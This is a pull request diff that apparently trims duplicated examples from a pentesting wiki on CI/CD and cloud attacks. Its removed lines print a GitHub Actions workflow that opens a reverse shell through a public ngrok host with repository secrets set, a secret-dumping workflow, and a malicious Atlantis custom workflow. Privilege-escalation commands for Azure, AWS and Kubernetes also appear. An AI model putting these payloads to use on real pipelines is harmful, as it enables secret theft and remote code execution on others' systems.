### PR TITLE
Recheck references and remove duplicate guidance

### DIFF
--- a/src/pentesting-ci-cd/atlantis-security.md
+++ b/src/pentesting-ci-cd/atlantis-security.md
@@ -262,29 +262,7 @@ Terraform environment variables can also alter CLI behavior, including `TF_CLI_A
 #### Custom Workflow
 
 Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of **master**.<sup>[[7]](#references)[[11]](#references)[[14]](#references)</sup>\
-This possibility was mentioned in a previous section:
-
-> [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
->
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
->
-> ```yaml
-> # atlantis.yaml
-> version: 3
-> projects:
->   - dir: .
->     workflow: custom1
-> workflows:
->   custom1:
->     plan:
->       steps:
->         - init
->         - run: my custom plan command
->     apply:
->       steps:
->         - run: my custom apply command
-> ```
+The required server-side settings and a complete malicious-workflow example are shown in the earlier **Workflow** subsection.
 
 #### Bypass plan/apply protections
 

--- a/src/pentesting-ci-cd/gitea-security/README.md
+++ b/src/pentesting-ci-cd/gitea-security/README.md
@@ -80,7 +80,7 @@ gpg --list-secret-keys --keyid-format=long
 
 For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
 
-A user token can be used **instead of a password** to **authenticate** against a Gitea server over Git HTTP<sup>[[8]](#references)</sup> and [**via API**](https://try.gitea.io/api/swagger#/)<sup>[[14]](#references)</sup>. Its effective access is bounded by the token's scopes and the user's permissions; a broad/full-scope token can act with the user's privileges.<sup>[[7]](#references)</sup>
+A user token can be used **instead of a password** to **authenticate** against a Gitea server over Git HTTP and [**via API**](https://try.gitea.io/api/swagger#/).<sup>[[8]](#references)[[14]](#references)</sup> Its effective access is bounded by the token's scopes and the user's permissions; a broad/full-scope token can act with the user's privileges.<sup>[[7]](#references)</sup>
 
 ### With Oauth Application
 

--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -101,60 +101,7 @@ curl -X POST \
 > [!CAUTION]
 > Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.<sup>[[19]](#references)[[20]](#references)</sup>
 
-<details>
-
-<summary>List secrets in Github Action output</summary>
-
-```yaml
-name: list_env
-on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
-jobs:
-  List_env:
-    runs-on: ubuntu-latest
-    steps:
-      - name: List Env
-        # Need to base64 encode or github will change the secret value for "***"
-        run: sh -c 'env | grep "secret_" | base64 -w0'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
-```
-
-</details>
-
-<details>
-
-<summary>Get reverse shell with secrets</summary>
-
-```yaml
-name: revshell
-on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
-jobs:
-  create_pull_request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Get Rev Shell
-        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
-```
-
-</details>
+Reusable workflow examples for reading environment-backed secrets and launching a process with those secrets are kept in [**Accessing secrets**](#accessing-secrets) below.
 
 It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:<sup>[[19]](#references)</sup>
 

--- a/src/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -570,22 +570,7 @@ When no permissions are specified for the a Lambda function, a role with permiss
 #### **Mitigation Strategies**
 
 - **Principle of Least Privilege:** Assign only necessary permissions to each function.<sup>[[8]](#references)[[14]](#references)</sup>
-
-  ```yaml
-  provider:
-    [...]
-    iam:
-      role:
-        statements:
-          - Effect: 'Allow'
-            Action:
-              - 'dynamodb:PutItem'
-              - 'dynamodb:Get*'
-              - 'dynamodb:Scan*'
-              - 'dynamodb:UpdateItem'
-              - 'dynamodb:DeleteItem'
-            Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage}
-  ```
+  - Review the earlier **IAM Roles and Permissions** example and restrict both its actions and resource ARN to what the function actually needs.
 
 - **Use Separate Roles:** Differentiate roles based on function requirements.<sup>[[8]](#references)</sup>
 

--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -134,7 +134,7 @@ output "dotoken" {
 
 In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file. Even if you would have write access over the config files, using the vector of state files is often way more sneaky, since you do not leave tracks in the `git` history.<sup>[[4]](#references)</sup>
 
-### RCE in Terraform: config file poisoning
+### RCE through provider state poisoning
 
 It is possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add a fake resource referencing the malicious provider.<sup>[[4]](#references)[[17]](#references)</sup>
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudfront-privesc/README.md
@@ -122,13 +122,7 @@ Add the published function to the target cache behavior’s distribution configu
 }
 ```
 
-Finally update the distribution configuration (remember to supply the current ETag):<sup>[[2]](#references)[[7]](#references)</sup>
-
-```bash
-CURRENT_ETAG=$(aws cloudfront get-distribution-config --id <distribution-id> --query 'ETag' --output text)
-
-aws cloudfront update-distribution --id <distribution-id> --distribution-config file://current-config.json --if-match $CURRENT_ETAG
-```
+Finally, update the distribution configuration using the ETag-aware `get-distribution-config` / `update-distribution` sequence shown in the preceding technique.<sup>[[2]](#references)[[7]](#references)</sup>
 
 ### `lambda:CreateFunction`, `lambda:PublishVersion`, `iam:PassRole` & `cloudfront:UpdateDistribution`
 

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md
@@ -507,11 +507,7 @@ It is also possible to poison data sources, skillsets, and indexers by modifying
 
 Enumerate search AI services and their locations first, then list or create query keys for those services. The Azure CLI and management API expose list/create operations for query keys.<sup>[[19]](#references)[[21]](#references)[[22]](#references)</sup>
 
-```bash
-az search service list --resource-group <RG>
-az search service show --name <SEARCH> --resource-group <RG> \
-  --query "{location:location, publicNetworkAccess:properties.publicNetworkAccess}"
-```
+Reuse the service enumeration commands from the preceding admin-key technique, then operate on the selected service.
 
 List existing query keys:
 

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -485,16 +485,15 @@ This permission allows adding group owners. A new owner can manage supported gro
 
 ```bash
 az ad group owner add --group <GroupName> --owner-object-id <UserId>
-az ad group member add --group <GroupName> --member-id <UserId>
 ```
+
+After becoming an owner, reuse the membership command from the preceding technique when the target group permits owner-managed membership.<sup>[[4]](#references)[[21]](#references)</sup>
 
 ### `microsoft.directory/groups/members/update`
 
 This permission allows adding members to supported groups. Adding an attacker-controlled account to a group that carries roles or resource access can grant that access.<sup>[[4]](#references)[[20]](#references)</sup>
 
-```bash
-az ad group member add --group <GroupName> --member-id <UserId>
-```
+Use the `az ad group member add` command shown under `allProperties/update`.
 
 ### `microsoft.directory/groups/dynamicMembershipRule/update`
 

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -8,6 +8,14 @@ Check the following page for more information:
 ../az-services/az-function-apps.md
 {{#endref}}
 
+Start by listing the Function App settings; the deployment-related values described below identify the backing storage or package location.<sup>[[3]](#references)</sup>
+
+```bash
+az functionapp config appsettings list \
+  --name <app-name> \
+  --resource-group <res-group>
+```
+
 ### Storage-backed deployment content
 
 With permissions to read the containers inside the Storage Account that stores the function data it's possible to find **different containers** (custom or with pre-defined names) that might contain **the code executed by the function**.
@@ -19,12 +27,6 @@ Once you find where the code of the function is located if you have write permis
 The code of the function is usually stored inside a file share.<sup>[[3]](#references)</sup> With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
 
 This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`**, which identify the storage connection and file share used for the app's content.<sup>[[3]](#references)</sup>
-
-```bash
-az functionapp config appsettings list \
-  --name <app-name> \
-  --resource-group <res-group>
-```
 
 Depending on how storage authentication is configured, these settings may contain a **Storage Account Key** that the Function can use to access the code; Azure Functions also supports identity-based storage connections.<sup>[[3]](#references)</sup>
 
@@ -54,12 +56,6 @@ It's also common to find the **zip releases** inside the folder `function-releas
 Package-based deployment can use a storage-backed package and the `WEBSITE_RUN_FROM_PACKAGE` setting to make that package the deployed content.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 Usually this deployment method will set the `WEBSITE_RUN_FROM_PACKAGE` config in the app settings.<sup>[[3]](#references)</sup>
-
-```bash
-az functionapp config appsettings list \
-  --name <app-name> \
-  --resource-group <res-group>
-```
 
 This config can contain a **SAS URL to download** the code from the Storage Account, or the value `1` for a package stored by the platform.<sup>[[3]](#references)[[4]](#references)</sup>
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -897,7 +897,7 @@ curl --path-as-is -i -s -k -X $'DELETE' \
     "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
 ```
 
-### Delete a Secret
+### Create a Service Account Token Secret
 
 ```bash
 CONTROL_PLANE_HOST=""

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -113,6 +113,14 @@ Here, Microsoft ARM refers to Azure Resource Manager (ARM).<sup>[[12]](#referenc
 
 It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.<sup>[[13]](#references)</sup>
 
+```bash
+# Install Checkov
+pip install checkov
+
+# Scan an IaC directory
+checkov -d ./path/to/yaml/or/chart
+```
+
 ### [**Kube-score**](https://github.com/zegl/kube-score)
 
 [**kube-score**](https://github.com/zegl/kube-score) is a tool that performs static code analysis of your Kubernetes object definitions.<sup>[[14]](#references)</sup>
@@ -126,6 +134,16 @@ To install:<sup>[[14]](#references)</sup>
 | Homebrew (macOS and Linux)                          | `brew install kube-score`                                                               |
 | [Krew](https://krew.sigs.k8s.io/) (macOS and Linux) | `kubectl krew install score`                                                            |
 
+Use kube-score directly on Kubernetes YAML or pipe rendered Helm templates into it:<sup>[[14]](#references)</sup>
+
+```bash
+kube-score score ./path/to/yaml
+helm template chart /path/to/chart | kube-score score -
+helm template chart /path/to/chart \
+  --set 'config.urls[0]=https://dummy.backend.internal' \
+  | kube-score score -
+```
+
 ## Tools to analyze YAML files & Helm Charts
 
 ### [**Kube-linter**](https://github.com/stackrox/kube-linter)
@@ -138,36 +156,6 @@ brew install kube-linter
 
 # Run Kube-linter
 ## lint ./path/to/yaml/or/chart
-```
-
-### [Checkov](https://github.com/bridgecrewio/checkov)
-
-Checkov can scan an IaC directory for security and compliance misconfigurations.<sup>[[13]](#references)</sup>
-
-```bash
-# Install Checkov
-pip install checkov
-
-# Run Checkov
-checkov -d ./path/to/yaml/or/chart
-```
-
-### [kube‑score](https://github.com/zegl/kube-score)
-
-Use kube-score for static analysis of Kubernetes YAML and rendered Helm charts.<sup>[[14]](#references)</sup>
-
-```bash
-# Install kube-score
-brew install kube-score
-
-# Run kube-score
-kube-score score ./path/to/yaml
-# or
-helm template chart /path/to/chart | kube-score score -
-# or if the chart needs some values
-helm template chart /path/to/chart \
-  --set 'config.urls[0]=https://dummy.backend.internal' \
-  | kube-score score -
 ```
 
 ### [Kubesec](https://github.com/controlplaneio/kubesec)

--- a/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
+++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
@@ -75,7 +75,7 @@ This service **run in every node of the cluster**. It's the service that will **
 
 If you find this service exposed you might have found an **unauthenticated RCE**.<sup>[[2]](#references)[[3]](#references)</sup>
 
-#### Kubelet API
+#### Unauthenticated API checks
 
 ```bash
 curl -k https://<IP address>:10250/metrics


### PR DESCRIPTION
## Summary
- audit all 591 SUMMARY pages for reference structure, numbering, citations, banner placement, and forbidden sources
- remove repeated examples and commands while preserving contextual guidance
- fix one citation punctuation issue and misleading/repeated headings

## Validation
- full structural audit: 591 pages, 7,342 references, 17,508 citations, 0 failures
- duplicate scan: 0 repeated three-line prose blocks; remaining repeated snippets manually classified as contextual or before/after verification
- `git diff --check`
- `mdbook build` attempted; blocked because `mdbook-tabs` is not installed locally